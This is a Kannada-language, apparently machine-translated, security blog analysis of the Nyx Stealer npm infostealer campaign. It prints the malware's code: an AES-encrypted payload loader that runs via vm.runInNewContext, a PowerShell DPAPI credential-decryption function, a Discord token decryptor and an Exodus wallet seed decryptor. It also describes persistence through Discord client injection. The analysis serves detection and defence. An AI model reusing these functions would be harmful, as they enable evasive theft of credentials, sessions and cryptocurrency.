npm ಮಾಹಿತಿ ಕಳ್ಳತನ

ಹೊಸ npm ಇನ್ಫೋಸ್ಟೀಲರ್ ಡಿಸ್ಕವರಿ: Nyx ​​ಸ್ಟೀಲರ್ ಡಿಸ್ಕಾರ್ಡ್ ಸೆಷನ್‌ಗಳನ್ನು ಹೈಜಾಕ್ ಮಾಡುತ್ತದೆ

ಪರಿವಿಡಿ

ಓದಲೇಬೇಕಾದ ಪೋಸ್ಟ್‌ಗಳು

ಇತ್ತೀಚಿನ ಆಸಕ್ತಿಯ ಪೋಸ್ಟ್‌ಗಳು

ಟಿಎಲ್; ಡಿಆರ್

ಕ್ಸಿಜೆನಿ ಭದ್ರತಾ ಸಂಶೋಧನಾ ತಂಡ ಎರಡು ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್‌ಗಳ ಮೂಲಕ ವಿತರಿಸಲಾದ ಅತ್ಯಾಧುನಿಕ npm ಇನ್ಫೋಸ್ಟೀಲರ್ ಅಭಿಯಾನವನ್ನು ಗುರುತಿಸಲಾಗಿದೆ: ಸಮಾಧಾನಪಡಿಸು ಮತ್ತು ಸೆಲ್ಫ್‌ಬಾಟ್-ಲೋಫಿ.

ಇತ್ತೀಚಿನ ಆವೃತ್ತಿ (consolelofy@1.3.0) ರನ್‌ಟೈಮ್‌ನಲ್ಲಿ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುವ ಮತ್ತು ಮೂಲಕ ಕಾರ್ಯಗತಗೊಳಿಸುವ 216KB AES-ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾದ ಪೇಲೋಡ್ ಅನ್ನು ಎಂಬೆಡ್ ಮಾಡುತ್ತದೆ vm.runInNewContext(). ದುರುದ್ದೇಶಪೂರಿತ ತರ್ಕವು ಸಂಪೂರ್ಣವಾಗಿ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಆಗಿರುವುದರಿಂದ, ಸ್ಟ್ರಿಂಗ್ ತಪಾಸಣೆಯನ್ನು ಅವಲಂಬಿಸಿರುವ ಸ್ಥಿರ ಸ್ಕ್ಯಾನರ್‌ಗಳು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಮಯದವರೆಗೆ ಅದರ ನಡವಳಿಕೆಯನ್ನು ಗಮನಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ.

ಒಮ್ಮೆ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ನಂತರ, ಪೇಲೋಡ್, ಆಂತರಿಕವಾಗಿ ಬ್ರಾಂಡ್ ಆಗುತ್ತದೆ ನೈಕ್ಸ್ ಸ್ಟೀಲರ್, ಗುರಿಗಳು:

  • ದೃಢೀಕರಣ ಟೋಕನ್‌ಗಳನ್ನು ತಿರಸ್ಕರಿಸಿ
  • 50+ ಬ್ರೌಸರ್ ರುಜುವಾತು ಅಂಗಡಿಗಳು
  • 90+ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್ ವಿಸ್ತರಣೆಗಳು
  • Roblox, Instagram, Spotify, Steam, Telegram ಮತ್ತು TikTok ಅವಧಿಗಳು
  • ಡೆಸ್ಕ್‌ಟಾಪ್ ಕ್ಲೈಂಟ್ ಸ್ಥಿರತೆಯನ್ನು ಡಿಸ್ಕಾರ್ಡ್ ಮಾಡಿ

ಎರಡೂ ಪ್ಯಾಕೇಜ್‌ಗಳಲ್ಲಿನ ಎಲ್ಲಾ 20 ಆವೃತ್ತಿಗಳನ್ನು ವರದಿ ಮಾಡಲಾಗಿದೆ ಮತ್ತು ದುರುದ್ದೇಶಪೂರಿತವೆಂದು ದೃಢಪಡಿಸಲಾಗಿದೆ.

ಈ npm ಮಾಹಿತಿ ಸ್ಟೀಲರ್‌ನ ತಾಂತ್ರಿಕ ಅವಲೋಕನ

ಸಾಂಪ್ರದಾಯಿಕ ಇನ್‌ಸ್ಟಾಲ್-ಟೈಮ್ ಮಾಲ್‌ವೇರ್‌ಗಿಂತ ಭಿನ್ನವಾಗಿ, ಈ ಅಭಿಯಾನವು ರನ್ಟೈಮ್ ಡೀಕ್ರಿಪ್ಶನ್ ಮಾದರಿ.

ಇವೆ:

  • ದುರುದ್ದೇಶಪೂರಿತವಲ್ಲ preinstall or postinstall hooks
  • ಸ್ಪಷ್ಟವಾದ ಸ್ಥಾಪನೆ-ಸಮಯದ ನೆಟ್‌ವರ್ಕ್ ಕರೆಗಳಿಲ್ಲ.
  • ಯಾವುದೇ ಸರಳ ಪಠ್ಯ ರುಜುವಾತು ಕೊಯ್ಲು ತರ್ಕವಿಲ್ಲ.

ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಆಮದು ಮಾಡಿಕೊಂಡಾಗ ಪೇಲೋಡ್ ಸಕ್ರಿಯಗೊಳ್ಳುತ್ತದೆ. ಸಂಪೂರ್ಣ ದುರುದ್ದೇಶಪೂರಿತ ದೇಹವು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಆಗಿರುತ್ತದೆ ಮತ್ತು ರನ್‌ಟೈಮ್‌ನಲ್ಲಿ ಮೆಮೊರಿಯಲ್ಲಿ ಮಾತ್ರ ಕಾರ್ಯರೂಪಕ್ಕೆ ಬರುತ್ತದೆ.

ಈ ವಿನ್ಯಾಸವು ಪ್ಯಾಕೇಜ್ ಅನುಸ್ಥಾಪನೆಯ ಸಮಯದಲ್ಲಿ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ನಿರ್ದಿಷ್ಟವಾಗಿ ತಪ್ಪಿಸುತ್ತದೆ.

ಈ npm ಮಾಹಿತಿ ಸ್ಟೀಲರ್ ನಿಜವಾಗಿ ಹೇಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ

Nyx ಸ್ಟೀಲರ್ ಏನು ಕದಿಯುತ್ತದೆ ಎಂಬುದನ್ನು ವಿಶ್ಲೇಷಿಸುವ ಮೊದಲು, ನಾವು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಬೇಕು ಅದು ಹೇಗೆ ಕಾರ್ಯರೂಪಕ್ಕೆ ಬರುತ್ತದೆ.

ಈ npm ಇನ್ಫೋಸ್ಟೀಲರ್‌ನೊಳಗಿನ ದುರುದ್ದೇಶಪೂರಿತ ತರ್ಕವು ಸ್ಥಿರವಾದ ಮಾದರಿಯನ್ನು ಅನುಸರಿಸುತ್ತದೆ:

ಒಂದು ಸಣ್ಣ ಲೋಡರ್ ದೊಡ್ಡ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಪೇಲೋಡ್ ಅನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಅದನ್ನು Node.js VM ಸನ್ನಿವೇಶದೊಳಗೆ ಕ್ರಿಯಾತ್ಮಕವಾಗಿ ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ.

ಈ ವಿನ್ಯಾಸವು ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿದೆ. ದಾಳಿಕೋರರು ಕಾರ್ಯವನ್ನು ಮರೆಮಾಚುವಿಕೆಯ ಹಿಂದೆ ಮಾತ್ರ ಮರೆಮಾಡುತ್ತಿಲ್ಲ, ಅವರು ಸ್ಥಿರ ಗೋಚರತೆಯಿಂದ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ತೆಗೆದುಹಾಕುವುದು.

ಉನ್ನತ ಮಟ್ಟದ ಕಾರ್ಯನಿರ್ವಾಹಕ ಮಾದರಿ

ಉನ್ನತ ಮಟ್ಟದಲ್ಲಿ, ಹೊದಿಕೆಯು ನಾಲ್ಕು ಕೆಲಸಗಳನ್ನು ಮಾಡುತ್ತದೆ:

  • SHA-256 ಬಳಸಿಕೊಂಡು ಹಾರ್ಡ್‌ಕೋಡ್ ಮಾಡಲಾದ ಪಾಸ್‌ಫ್ರೇಸ್‌ನಿಂದ AES ಕೀಲಿಯನ್ನು ಪಡೆಯುತ್ತದೆ.
  • AES-256-CBC ಬಳಸಿಕೊಂಡು ದೊಡ್ಡ ಹೆಕ್ಸ್-ಎನ್‌ಕೋಡ್ ಮಾಡಿದ ಸೈಫರ್‌ಟೆಕ್ಸ್ಟ್ ಅನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ.
  • ಬಳಸಿಕೊಂಡು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ vm.runInNewContext()
  • ಇನ್ನೂ ಪ್ರಬಲ ರನ್‌ಟೈಮ್ ಆದಿಮಗಳನ್ನು ಬಹಿರಂಗಪಡಿಸುವ ಸ್ಯಾಂಡ್‌ಬಾಕ್ಸ್ ಅನ್ನು ಒದಗಿಸುತ್ತದೆ.

ಮೂಲ ತಂತ್ರದ ಸಾರಾಂಶ

ಕಾಂಪೊನೆಂಟ್ ಸಂರಚನೆ / ಮೌಲ್ಯ
ಕ್ರಮಾವಳಿ ಎಇಎಸ್ -256-ಸಿಬಿಸಿ
ಪ್ರಮುಖ ವ್ಯುತ್ಪತ್ತಿ SHA-256(ಪಾಸ್‌ಫ್ರೇಸ್)
ಇನಿಶಿಯಲೈಸೇಶನ್ ವೆಕ್ಟರ್ (IV) 0x00 ರ 16 ಬೈಟ್‌ಗಳು
ಮರಣದಂಡನೆ vm.runInNewContext(ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ, ಸ್ಯಾಂಡ್‌ಬಾಕ್ಸ್)

ನಿರ್ಣಾಯಕವಾಗಿ, ಸ್ಯಾಂಡ್‌ಬಾಕ್ಸ್ ಇದರ ಮೂಲಕ ಹಾದುಹೋಗುತ್ತದೆ:

  • require
  • process
  • Buffer
  • ಟೈಮರ್‌ಗಳು
  • ಮಾಡ್ಯೂಲ್ ರಫ್ತುಗಳು

ಇದರರ್ಥ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಲಾದ ಪೇಲೋಡ್ ಪೂರ್ಣ ಸಾಮರ್ಥ್ಯವನ್ನು ಉಳಿಸಿಕೊಳ್ಳುತ್ತದೆ:

  • ಸ್ಪಾನ್ ಪ್ರಕ್ರಿಯೆಗಳು
  • ಫೈಲ್‌ಗಳನ್ನು ಓದಿ ಮತ್ತು ಬರೆಯಿರಿ
  • ನೆಟ್‌ವರ್ಕ್ ಕರೆಗಳನ್ನು ಮಾಡಿ
  • ಸ್ಥಳೀಯ ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ಮಾರ್ಪಡಿಸಿ

ಇದು ನಿರ್ಬಂಧಿತ VM ಅಲ್ಲ. ಇದು ಎಕ್ಸಿಕ್ಯೂಶನ್ ಟ್ರಾಂಪೊಲೈನ್ ಆಗಿ ಬಳಸಲಾಗುವ VM ಆಗಿದೆ.

ರನ್‌ಟೈಮ್ ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಪ್ಯಾಟರ್ನ್ (ಕೋರ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಮೆಕ್ಯಾನಿಸಂ)

ಲೋಡರ್ ಚಿಕ್ಕದಾಗಿದೆ.
ದುರುದ್ದೇಶಪೂರಿತ ದೇಹವು ಅಲ್ಲ.

ಪ್ಯಾಕೇಜ್ ಒಳಗೆ ಕಂಡುಬರುವ ಕಾರ್ಯಗತಗೊಳಿಸುವ ಮಾದರಿ ಕೆಳಗೆ ಇದೆ:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

ಏಕೆ ಈ ವಿಷಯಗಳು

ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಪೇಲೋಡ್:

  • ಡಸ್ ಅಲ್ಲ npm ಪ್ಯಾಕೇಜ್ ಒಳಗೆ ಸರಳ ಪಠ್ಯದಲ್ಲಿ ಅಸ್ತಿತ್ವದಲ್ಲಿದೆ.
  • ಸರಳ ವ್ಯಕ್ತಿಗೆ ಅಗೋಚರವಾಗಿರುತ್ತದೆ grep ಅಥವಾ ಸ್ಥಿರ ಸ್ಟ್ರಿಂಗ್ ಸ್ಕ್ಯಾನಿಂಗ್
  • ರನ್‌ಟೈಮ್‌ನಲ್ಲಿ ಮಾತ್ರ ಮೆಮೊರಿಯಲ್ಲಿ ಕಾರ್ಯರೂಪಕ್ಕೆ ಬರುತ್ತದೆ
  • ಪೂರ್ಣ ನೋಡ್ ರನ್‌ಟೈಮ್ ಸಾಮರ್ಥ್ಯಗಳೊಂದಿಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ

ಈ AES + VM ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಂಯೋಜನೆಯು ಒಂದು ಬಲವಾದ ವರ್ತನೆಯ ಸೂಚಕವಾಗಿದೆ npm ಮಾಹಿತಿ ಕಳ್ಳರು ಸ್ಥಿರ ತಪಾಸಣೆಯಿಂದ ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ಪ್ರಯತ್ನಿಸುತ್ತಿದ್ದಾರೆ.

ಬೇರೆ ರೀತಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ:

ನೀವು ಪ್ಯಾಕೇಜ್ ಮೂಲ ವೃಕ್ಷವನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಿದರೆ, ನಿಮಗೆ ಕಳ್ಳತನ ಮಾಡುವವರು ಕಾಣಿಸುವುದಿಲ್ಲ.
ನೀವು ಡಿಕ್ರಿಪ್ಟರ್ ಅನ್ನು ನೋಡುತ್ತೀರಿ.

ಡೀಕ್ರಿಪ್ಶನ್ ನಂತರ ಏನಾಗುತ್ತದೆ

ಒಮ್ಮೆ ಕಾರ್ಯಗತಗೊಳಿಸಿದ ನಂತರ, Nyx ಸ್ಟೀಲರ್ ಸಮಾನಾಂತರ ಡೇಟಾ ಸಂಗ್ರಹಣಾ ಅಲೆಗಳನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ.

ತರಂಗ 1: ಬ್ರೌಸರ್ ರುಜುವಾತು ಹೊರತೆಗೆಯುವಿಕೆ

ಮಾಲ್‌ವೇರ್:

  • NuGet CDN ನಿಂದ ಪೈಥಾನ್ ರನ್‌ಟೈಮ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡುತ್ತದೆ
  • ಕ್ರಿಪ್ಟೋಗ್ರಾಫಿಕ್ ಲೈಬ್ರರಿಗಳನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ
  • Chromium-ಆಧಾರಿತ ರುಜುವಾತು ಅಂಗಡಿಗಳನ್ನು ಹೊರತೆಗೆಯುತ್ತದೆ
  • DPAPI- ರಕ್ಷಿತ ರಹಸ್ಯಗಳನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ

ಸ್ಥಳೀಯ ಬೈಂಡಿಂಗ್‌ಗಳನ್ನು ಕಂಪೈಲ್ ಮಾಡುವ ಬದಲು, ಇದು ವಿಂಡೋಸ್ DPAPI ಗೆ ನೇರವಾಗಿ ಕರೆ ಮಾಡಲು ಪವರ್‌ಶೆಲ್ ಅನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತದೆ.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

ಈ ವಿಧಾನ:

  • ಸಂಕಲನ ಕಲಾಕೃತಿಗಳನ್ನು ತಪ್ಪಿಸುತ್ತದೆ
  • ಸ್ಥಳೀಯ ವಿಂಡೋಸ್ ಕ್ರಿಪ್ಟೋ API ಗಳನ್ನು ಬಳಸುತ್ತದೆ
  • ಆಡಳಿತಾತ್ಮಕ ಪರಿಕರಗಳಲ್ಲಿ ಮಿಶ್ರಣವಾಗುತ್ತದೆ

ಇದು OS-ಮಟ್ಟದ ರುಜುವಾತು ಡೀಕ್ರಿಪ್ಶನ್ ಆಗಿದೆ, ಸ್ಕ್ರ್ಯಾಪಿಂಗ್ ಅಲ್ಲ.

ವೇವ್ 2: ಡಿಸ್ಕಾರ್ಡ್ ಟೋಕನ್ ಡೀಕ್ರಿಪ್ಶನ್

ಕಳ್ಳತನ ಮಾಡುವವನು ಪ್ರೋಟೋಕಾಲ್ ಬಗ್ಗೆ ತಿಳಿದಿರುತ್ತಾನೆ. ಅದು ಡಿಸ್ಕಾರ್ಡ್‌ನ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಟೋಕನ್ ಸ್ವರೂಪವನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳುತ್ತದೆ.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

ಕಾರ್ಯಾಚರಣೆಯ ಹರಿವು:

  • ಡಿಸ್ಕಾರ್ಡ್‌ನಿಂದ ಮಾಸ್ಟರ್ ಕೀಯನ್ನು ಹೊರತೆಗೆಯಿರಿ Local State
  • DPAPI ಮೂಲಕ ಮಾಸ್ಟರ್ ಕೀಯನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿ
  • AES-GCM ಟೋಕನ್ ಬ್ಲಾಬ್‌ಗಳನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿ
  • ಡಿಸ್ಕಾರ್ಡ್ API ವಿರುದ್ಧ ಟೋಕನ್‌ಗಳನ್ನು ಮೌಲ್ಯೀಕರಿಸಿ
  • ನೈಟ್ರೋ, ಬ್ಯಾಡ್ಜ್‌ಗಳು, ಬಿಲ್ಲಿಂಗ್ ಮಾಹಿತಿಯೊಂದಿಗೆ ಸಮೃದ್ಧಗೊಳಿಸಿ

ಇದು ಸಾಮಾನ್ಯ ರುಜುವಾತು ಡಂಪಿಂಗ್ ಅಲ್ಲ. ಇದು ಪ್ರೋಟೋಕಾಲ್-ಅವೇರ್ ಸೆಷನ್ ಹೈಜಾಕಿಂಗ್ ಆಗಿದೆ.

ಅಲೆ 3: ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್ ಗುರಿ

npm ಮಾಹಿತಿ ವೀಕ್ಷಕರು ಪಟ್ಟಿ ಮಾಡುತ್ತಾರೆ:

  • 90+ ಬ್ರೌಸರ್ ವ್ಯಾಲೆಟ್ ವಿಸ್ತರಣೆಗಳು
  • 27 ಡೆಸ್ಕ್‌ಟಾಪ್ ವ್ಯಾಲೆಟ್‌ಗಳು
  • ಶೀತಲ ಕೈಚೀಲ ಮಾರ್ಗಗಳು
  • ಎಕ್ಸೋಡಸ್ ಬೀಜದ ಫೈಲ್‌ಗಳು

ಬೀಜ ಡೀಕ್ರಿಪ್ಶನ್ ಪ್ರಯತ್ನದ ಉದಾಹರಣೆ:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

ಯಶಸ್ವಿಯಾದರೆ, ವ್ಯಾಲೆಟ್ ರಾಜಿ ತಕ್ಷಣದ ಮತ್ತು ಬದಲಾಯಿಸಲಾಗದು.

ಇದು ಅಭಿಯಾನದ ಅತ್ಯಧಿಕ ಮೌಲ್ಯದ ಹಣಗಳಿಕೆ ವೆಕ್ಟರ್ ಅನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತದೆ.

ಡಿಸ್ಕಾರ್ಡ್ ಡೆಸ್ಕ್‌ಟಾಪ್ ಇಂಜೆಕ್ಷನ್ ಮೂಲಕ ನಿರಂತರತೆ

ರುಜುವಾತುಗಳನ್ನು ಸಂಗ್ರಹಿಸಿದ ನಂತರ, Nyx ಸ್ಟೀಲರ್ ಸ್ಥಳೀಯವನ್ನು ಮಾರ್ಪಡಿಸುವ ಮೂಲಕ ನಿರಂತರತೆಯನ್ನು ಪ್ರಯತ್ನಿಸುತ್ತದೆ ಅಪವಾದ ಕ್ಲೈಂಟ್.

ಗುರಿ:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

ಕಾರ್ಯಾಚರಣೆಯ ಅನುಕ್ರಮ

ಮಾಹಿತಿ ಸ್ಥಾಪಕವು ಈ ಕೆಳಗಿನ ಹಂತಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ:

  • ಡಿಸ್ಕಾರ್ಡ್ ಪ್ರಕ್ರಿಯೆಗಳನ್ನು ಚಾಲನೆ ಮಾಡುವುದನ್ನು ಕೊನೆಗೊಳಿಸುತ್ತದೆ
  • ಸ್ಥಾಪಿಸಲಾದ ಡಿಸ್ಕಾರ್ಡ್ ರೂಪಾಂತರಗಳನ್ನು ಪತ್ತೆ ಮಾಡುತ್ತದೆ (ಸ್ಟೇಬಲ್, ಕ್ಯಾನರಿ, ಪಿಟಿಬಿ)
  • ತಿದ್ದಿ ಬರೆಯುತ್ತದೆ discord_desktop_core/index.js
  • ಆಕ್ರಮಣಕಾರ-ನಿಯಂತ್ರಿತ ವೆಬ್‌ಹುಕ್ ತರ್ಕವನ್ನು ಇಂಜೆಕ್ಟ್ ಮಾಡುತ್ತದೆ
  • ಡಿಸ್ಕಾರ್ಡ್ ಅನ್ನು ಮರುಪ್ರಾರಂಭಿಸುತ್ತದೆ

ಇದು ಭವಿಷ್ಯದ ಡಿಸ್ಕಾರ್ಡ್ ಅವಧಿಗಳು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಹೊಸ ದೃಢೀಕರಣ ಟೋಕನ್‌ಗಳನ್ನು ಸೋರಿಕೆ ಮಾಡುವುದನ್ನು ಖಚಿತಪಡಿಸುತ್ತದೆ.

ಮುಖ್ಯವಾಗಿ, ಈ ನಿರಂತರತೆಯು ನಿಗದಿತ ಕಾರ್ಯಗಳು ಅಥವಾ ನೋಂದಾವಣೆ ಮಾರ್ಪಾಡುಗಳನ್ನು ಅವಲಂಬಿಸಿಲ್ಲ. ಇದು ಅಪ್ಲಿಕೇಶನ್-ಮಟ್ಟದ ಕೋಡ್ ಮಾರ್ಪಾಡನ್ನು ನಿಯಂತ್ರಿಸುತ್ತದೆ, ಇದು ರಹಸ್ಯವಾದ ವಿಧಾನವಾಗಿದೆ.

ದುರುದ್ದೇಶಪೂರಿತ npm ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನಂತರ ತೆಗೆದುಹಾಕಿದರೂ ಸಹ, ಡಿಸ್ಕಾರ್ಡ್ ಕ್ಲೈಂಟ್ ಅಪಾಯದಲ್ಲಿದೆ.

ತಾಂತ್ರಿಕ ಹೋಲಿಕೆ: ಕಾನೂನುಬದ್ಧ ಸೆಲ್ಫ್‌ಬಾಟ್ vs npm ಇನ್ಫೋಸ್ಟೀಲರ್

ಕಾಂಪೊನೆಂಟ್ ಕಾನೂನುಬದ್ಧ ಗ್ರಂಥಾಲಯ Nyx npm ಮಾಹಿತಿ ಕಳ್ಳತನ
ಎನ್ಕ್ರಿಪ್ಶನ್ ಯಾವುದೂ ಪೂರ್ಣ AES-ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಪೇಲೋಡ್
ರನ್‌ಟೈಮ್ VM ಅಗತ್ಯವಿಲ್ಲ vm.runInNewContext ಮರಣದಂಡನೆ
ರುಜುವಾತು ಪ್ರವೇಶ ಡಿಸ್ಕಾರ್ಡ್ API ಮಾತ್ರ ಬ್ರೌಸರ್, ವ್ಯಾಲೆಟ್‌ಗಳು, DPAPI
ಬಾಹ್ಯ ಡೌನ್‌ಲೋಡ್‌ಗಳು ಇಲ್ಲ ನುಗೆಟ್ ಮೂಲಕ ಪೈಥಾನ್ ರನ್‌ಟೈಮ್
ನಿರಂತರತೆ ಇಲ್ಲ ಡಿಸ್ಕಾರ್ಡ್ ಕ್ಲೈಂಟ್ ಇಂಜೆಕ್ಷನ್
ಹಣಗಳಿಕೆ ಬಾಟ್ ಆಟೊಮೇಷನ್ ರುಜುವಾತು ಮರುಮಾರಾಟ

ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಲೇಯರ್ ಮಾತ್ರ ಈ ಅಭಿಯಾನವನ್ನು ವಿಶಿಷ್ಟವಾದ ಓಪನ್ ಸೋರ್ಸ್ ಫೋರ್ಕ್‌ನಿಂದ ಬೇರ್ಪಡಿಸುತ್ತದೆ.

ಒಂದು ಕಾನೂನುಬದ್ಧ ಡಿಸ್ಕಾರ್ಡ್ ಸೆಲ್ಫ್‌ಬಾಟ್ ತನ್ನ ಸಂಪೂರ್ಣ ಕೋಡ್‌ಬೇಸ್ ಅನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು, DPAPI ಅನ್ನು ಪ್ರವೇಶಿಸಲು ಪವರ್‌ಶೆಲ್ ಅನ್ನು ಉತ್ಪಾದಿಸಲು, ಬಾಹ್ಯ ರನ್‌ಟೈಮ್‌ಗಳನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ಅಥವಾ ಡೆಸ್ಕ್‌ಟಾಪ್ ಅಪ್ಲಿಕೇಶನ್ ಇಂಟರ್ನಲ್‌ಗಳನ್ನು ಮಾರ್ಪಡಿಸಲು ಯಾವುದೇ ಕಾರಣವಿರುವುದಿಲ್ಲ. ಡಿಸ್ಕಾರ್ಡ್ ಸಂವಹನಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸುವುದಾಗಿ ಹೇಳಿಕೊಳ್ಳುವ ಅವಲಂಬನೆಯೊಳಗೆ ಆ ಸಾಮರ್ಥ್ಯಗಳು ಕಾಣಿಸಿಕೊಂಡಾಗ, ವಾಸ್ತುಶಿಲ್ಪದ ಹೊಂದಾಣಿಕೆಯನ್ನು ನಿರ್ಲಕ್ಷಿಸುವುದು ಅಸಾಧ್ಯವಾಗುತ್ತದೆ.

ತನಿಖಾ ದೃಷ್ಟಿಕೋನದಿಂದ, ಈ npm ಇನ್ಫೋಸ್ಟೀಲರ್ ಬಹು ಪದರಗಳಲ್ಲಿ ಕುರುಹುಗಳನ್ನು ಬಿಡುತ್ತದೆ. ಆದಾಗ್ಯೂ, ಅತ್ಯಂತ ವಿಶ್ವಾಸಾರ್ಹ ಸೂಚಕಗಳು ಹಾರ್ಡ್‌ಕೋಡ್ ಮಾಡಿದ URL ಗಳು ಅಥವಾ ನಿರ್ದಿಷ್ಟ ಫೈಲ್ ಪಥಗಳಲ್ಲ, ಏಕೆಂದರೆ ಅವು ಆವೃತ್ತಿಗಳ ನಡುವೆ ಬದಲಾಗಬಹುದು. ಬದಲಾಗಿ, ಬಾಳಿಕೆ ಬರುವ ಸಂಕೇತಗಳು ರಚನಾತ್ಮಕವಾಗಿವೆ.

ಪ್ಯಾಕೇಜ್ ಮಟ್ಟದಲ್ಲಿ, ಅತ್ಯಂತ ಪ್ರಬಲವಾದ ಕೆಂಪು ಧ್ವಜವೆಂದರೆ ದೊಡ್ಡ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಪೇಲೋಡ್ ಮತ್ತು ರನ್‌ಟೈಮ್ ಡೀಕ್ರಿಪ್ಶನ್ ಹೊದಿಕೆಯ ಸಂಯೋಜನೆಯಾಗಿದ್ದು ಅದು ತಕ್ಷಣವೇ via ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ. vm.runInNewContext(). ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಮಾತ್ರ ಅಂತರ್ಗತವಾಗಿ ದುರುದ್ದೇಶಪೂರಿತವಲ್ಲದಿದ್ದರೂ, ಡಿಸ್ಕಾರ್ಡ್ ಯುಟಿಲಿಟಿ ಪ್ಯಾಕೇಜ್ ಒಳಗೆ AES ಡೀಕ್ರಿಪ್ಶನ್ ನಂತರ ಡೈನಾಮಿಕ್ VM ಎಕ್ಸಿಕ್ಯೂಶನ್ ಬಳಸುವುದು ಹೆಚ್ಚು ಅಸಹಜವಾಗಿದೆ.

